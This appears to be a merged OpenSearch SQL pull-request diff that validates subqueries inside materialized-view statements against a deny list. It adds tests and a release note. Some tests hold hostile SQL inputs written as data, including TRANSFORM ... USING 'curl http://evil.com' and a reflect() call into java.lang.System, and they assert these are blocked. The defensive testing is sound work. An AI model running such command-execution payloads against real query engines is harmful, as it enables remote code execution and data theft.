Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -184,6 +184,7 @@ public enum FunctionType {
"from_unixtime",
"from_utc_timestamp",
"hour",
"hop",
"last_day",
"localtimestamp",
"make_date",
Expand Down Expand Up @@ -211,6 +212,7 @@ public enum FunctionType {
"to_unix_timestamp",
"to_utc_timestamp",
"trunc",
"tumble",
"try_to_timestamp",
"unix_date",
"unix_micros",
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.opensearch.sql.datasource.model.DataSourceType;
import org.opensearch.sql.spark.dispatcher.model.IndexQueryDetails;
import org.opensearch.sql.spark.utils.SQLQueryUtils;

/** Validate input SQL query based on the DataSourceType. */
Expand Down Expand Up @@ -38,10 +39,18 @@ public void validate(String sqlQuery, DataSourceType datasourceType) {
}

/**
* Validates a query from the Flint extension grammar. The method is currently a no-op.
* Validates a Flint extension query by extracting and validating any embedded SQL subquery. For
* CREATE MATERIALIZED VIEW statements, the inner query is validated against the same deny list
* used for standard SQL queries.
*
* @param sqlQuery The Flint extension query to be validated
* @param dataSourceType The type of the datasource the query is being run on
*/
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {}
public void validateFlintExtensionQuery(String sqlQuery, DataSourceType dataSourceType) {
  // Pull the materialized-view SELECT (if any) out of the parsed Flint statement.
  final String embeddedQuery = SQLQueryUtils.extractIndexDetails(sqlQuery).getMvQuery();
  if (embeddedQuery == null) {
    // No embedded MV query was extracted, so there is nothing further to check here.
    return;
  }
  // Reuse the standard SQL validation path for the embedded query.
  validate(embeddedQuery, dataSourceType);
}
}
Original file line number Diff line number Diff line change
Expand Up @@ -501,6 +501,77 @@ void testDispatchShowMVQuery() {
testDispatchBatchQuery("SHOW MATERIALIZED VIEW IN mys3.default");
}

@Test
void testDispatchMVWithWindowFunctionAllowed() {
  // Auto-refreshing materialized view whose inner SELECT groups by window(...); the dispatcher
  // is expected to accept it and submit exactly one job run.
  final String createMvStatement =
      "CREATE MATERIALIZED VIEW my_glue.default.mv_window AS"
          + " SELECT window.start AS `start.time`, COUNT(*) AS count"
          + " FROM my_glue.default.http_logs WHERE status != 200"
          + " GROUP BY window(`@timestamp`, '1 Minutes')"
          + " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
          + " checkpoint_location = 's3://bucket/checkpoint',"
          + " watermark_delay = '10 Minutes')";

  when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
  when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
  when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
  DataSourceMetadata glueMetadata = constructMyGlueDataSourceMetadata();
  when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
          MY_GLUE, asyncQueryRequestContext))
      .thenReturn(glueMetadata);

  DispatchQueryResponse dispatched =
      sparkQueryDispatcher.dispatch(
          getBaseDispatchQueryRequest(createMvStatement), asyncQueryRequestContext);

  verify(emrServerlessClient, times(1)).startJobRun(any());
  assertEquals(EMR_JOB_ID, dispatched.getJobId());
}

@Test
void testDispatchMVWithTumbleFunctionAllowed() {
  // Materialized view whose inner SELECT groups by TUMBLE(...); the dispatcher is expected to
  // accept it and submit exactly one job run.
  final String createMvStatement =
      "CREATE MATERIALIZED VIEW my_glue.default.mv_tumble AS"
          + " SELECT window.start AS `start.time`, COUNT(*) AS count"
          + " FROM my_glue.default.http_logs WHERE status != 200"
          + " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
          + " WITH (auto_refresh = false)";

  when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
  when(queryIdProvider.getQueryId(any(), any())).thenReturn(QUERY_ID);
  when(emrServerlessClient.startJobRun(any())).thenReturn(EMR_JOB_ID);
  DataSourceMetadata glueMetadata = constructMyGlueDataSourceMetadata();
  when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
          MY_GLUE, asyncQueryRequestContext))
      .thenReturn(glueMetadata);

  DispatchQueryResponse dispatched =
      sparkQueryDispatcher.dispatch(
          getBaseDispatchQueryRequest(createMvStatement), asyncQueryRequestContext);

  verify(emrServerlessClient, times(1)).startJobRun(any());
  assertEquals(EMR_JOB_ID, dispatched.getJobId());
}

@Test
void testDispatchMVWithTransformBlocked() {
  // Materialized view whose inner SELECT uses TRANSFORM ... USING; dispatch is expected to fail
  // with IllegalArgumentException before the EMR Serverless client is touched.
  final String maliciousMvStatement =
      "CREATE MATERIALIZED VIEW my_glue.default.mv_exploit AS"
          + " SELECT TRANSFORM(status) USING 'curl http://evil.com' AS x"
          + " FROM my_glue.default.http_logs"
          + " WITH (auto_refresh = false)";

  DataSourceMetadata glueMetadata = constructMyGlueDataSourceMetadata();
  when(dataSourceService.verifyDataSourceAccessAndGetRawMetadata(
          MY_GLUE, asyncQueryRequestContext))
      .thenReturn(glueMetadata);

  IllegalArgumentException rejection =
      Assertions.assertThrows(
          IllegalArgumentException.class,
          () ->
              sparkQueryDispatcher.dispatch(
                  getBaseDispatchQueryRequest(maliciousMvStatement), asyncQueryRequestContext));

  String rejectionMessage = rejection.getMessage();
  Assertions.assertTrue(rejectionMessage.contains("TRANSFORM is not allowed"));
  verifyNoInteractions(emrServerlessClient);
}

@Test
void testRefreshIndexQuery() {
when(emrServerlessClientFactory.getClient(any())).thenReturn(emrServerlessClient);
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,6 @@
import static org.mockito.Mockito.when;

import java.util.Arrays;
import java.util.UUID;
import lombok.AllArgsConstructor;
import lombok.Getter;
import org.antlr.v4.runtime.CommonTokenStream;
Expand Down Expand Up @@ -577,11 +576,111 @@ void testSecurityLakeQueries() {
}

@Test
void testValidateFlintExtensionQuery() {
void testValidateFlintExtensionQuery_safeQuery() {
  // A plain SELECT inside CREATE MATERIALIZED VIEW is expected to pass the S3Glue validator.
  final String safeMvStatement =
      "CREATE MATERIALIZED VIEW mv AS select * from table WITH (auto_refresh = false)";
  when(mockedProvider.getValidatorForDatasource(any()))
      .thenReturn(new S3GlueSQLGrammarElementValidator());

  assertDoesNotThrow(
      () -> sqlQueryValidator.validateFlintExtensionQuery(safeMvStatement, DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_blocksTransformInMV() {
  // TRANSFORM ... USING inside the MV's SELECT is expected to be rejected.
  final String mvWithTransform =
      "CREATE MATERIALIZED VIEW mv AS SELECT TRANSFORM(id) USING 'cmd' AS x FROM tbl"
          + " WITH (auto_refresh = false)";
  when(mockedProvider.getValidatorForDatasource(any()))
      .thenReturn(new S3GlueSQLGrammarElementValidator());

  assertThrows(
      IllegalArgumentException.class,
      () -> sqlQueryValidator.validateFlintExtensionQuery(mvWithTransform, DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_blocksReflectInMV() {
  // A reflect(...) call inside the MV's SELECT is expected to be rejected.
  final String mvWithReflect =
      "CREATE MATERIALIZED VIEW mv AS SELECT reflect('java.lang.System', 'getenv',"
          + " 'PATH') FROM tbl WITH (auto_refresh = false)";
  when(mockedProvider.getValidatorForDatasource(any()))
      .thenReturn(new S3GlueSQLGrammarElementValidator());

  assertThrows(
      IllegalArgumentException.class,
      () -> sqlQueryValidator.validateFlintExtensionQuery(mvWithReflect, DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_nonMVStatementsPass() {
  // Flint statements that are not CREATE MATERIALIZED VIEW; each is expected to validate
  // without throwing. Checked in the listed order.
  final String[] nonCreateMvStatements = {
    "DROP MATERIALIZED VIEW mv",
    "REFRESH MATERIALIZED VIEW mv",
    "CREATE SKIPPING INDEX ON tbl (col VALUE_SET)"
  };

  for (String statement : nonCreateMvStatements) {
    assertDoesNotThrow(
        () -> sqlQueryValidator.validateFlintExtensionQuery(statement, DataSourceType.S3GLUE));
  }
}

@Test
void testValidateFlintExtensionQuery_mvWithWindowFunction() {
  // Grouping by window(...) inside the MV's SELECT is expected to be allowed.
  final String mvWithWindow =
      "CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
          + " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
          + " GROUP BY window(`@timestamp`, '1 Minutes')"
          + " WITH (auto_refresh = true, refresh_interval = '1 Minutes',"
          + " checkpoint_location = 's3://bucket/checkpoint',"
          + " watermark_delay = '10 Minutes')";
  when(mockedProvider.getValidatorForDatasource(any()))
      .thenReturn(new S3GlueSQLGrammarElementValidator());

  assertDoesNotThrow(
      () -> sqlQueryValidator.validateFlintExtensionQuery(mvWithWindow, DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_mvWithTumbleFunction() {
  // Grouping by TUMBLE(...) inside the MV's SELECT is expected to be allowed.
  final String mvWithTumble =
      "CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
          + " COUNT(*) AS count FROM ds.default.http_logs WHERE status != 200"
          + " GROUP BY TUMBLE(`@timestamp`, '6 Hours')"
          + " WITH (auto_refresh = false)";
  when(mockedProvider.getValidatorForDatasource(any()))
      .thenReturn(new S3GlueSQLGrammarElementValidator());

  assertDoesNotThrow(
      () -> sqlQueryValidator.validateFlintExtensionQuery(mvWithTumble, DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_mvWithHopFunction() {
  // Grouping by HOP(...) inside the MV's SELECT is expected to be allowed.
  final String mvWithHop =
      "CREATE MATERIALIZED VIEW ds.default.mv AS SELECT window.start AS `start.time`,"
          + " COUNT(*) AS count FROM ds.default.http_logs"
          + " GROUP BY HOP(`@timestamp`, '5 Minutes', '10 Minutes')"
          + " WITH (auto_refresh = false)";
  when(mockedProvider.getValidatorForDatasource(any()))
      .thenReturn(new S3GlueSQLGrammarElementValidator());

  assertDoesNotThrow(
      () -> sqlQueryValidator.validateFlintExtensionQuery(mvWithHop, DataSourceType.S3GLUE));
}

@Test
void testValidateFlintExtensionQuery_coveringIndexPass() {
// Asserts that validating a CREATE INDEX (covering index) statement does not throw.
// NOTE(review): no grammar validator is stubbed in this test, so it presumably relies on a
// covering-index statement carrying no embedded materialized-view query to validate — confirm.
assertDoesNotThrow(
() ->
sqlQueryValidator.validateFlintExtensionQuery(
UUID.randomUUID().toString(), DataSourceType.SECURITY_LAKE));
"CREATE INDEX idx ON ds.default.http_logs (status, day, clientip)"
+ " WITH (auto_refresh = true, refresh_interval = '5 minute',"
+ " checkpoint_location = 's3://bucket/checkpoint')",
DataSourceType.S3GLUE));
}

@Test
Expand Down
1 change: 1 addition & 0 deletions release-notes/opensearch-sql.release-notes-3.7.0.0.md
Original file line number Diff line number Diff line change
Expand Up @@ -32,6 +32,7 @@ Compatible with OpenSearch and OpenSearch Dashboards version 3.7.0
* Create parquet-backed test indices for `spath` command analytics-engine route ([#5441](https://github.com/opensearch-project/sql/pull/5441))
* Improve error messages for invalid index mapping by formatting index patterns and including underlying error details ([#5370](https://github.com/opensearch-project/sql/pull/5370))
* Initial implementation of report-builder interface for richer error context in responses ([#5266](https://github.com/opensearch-project/sql/pull/5266))
* Validate materialized view subqueries against SQL grammar deny list ([#5485](https://github.com/opensearch-project/sql/pull/5485))

### Bug Fixes

Expand Down
Loading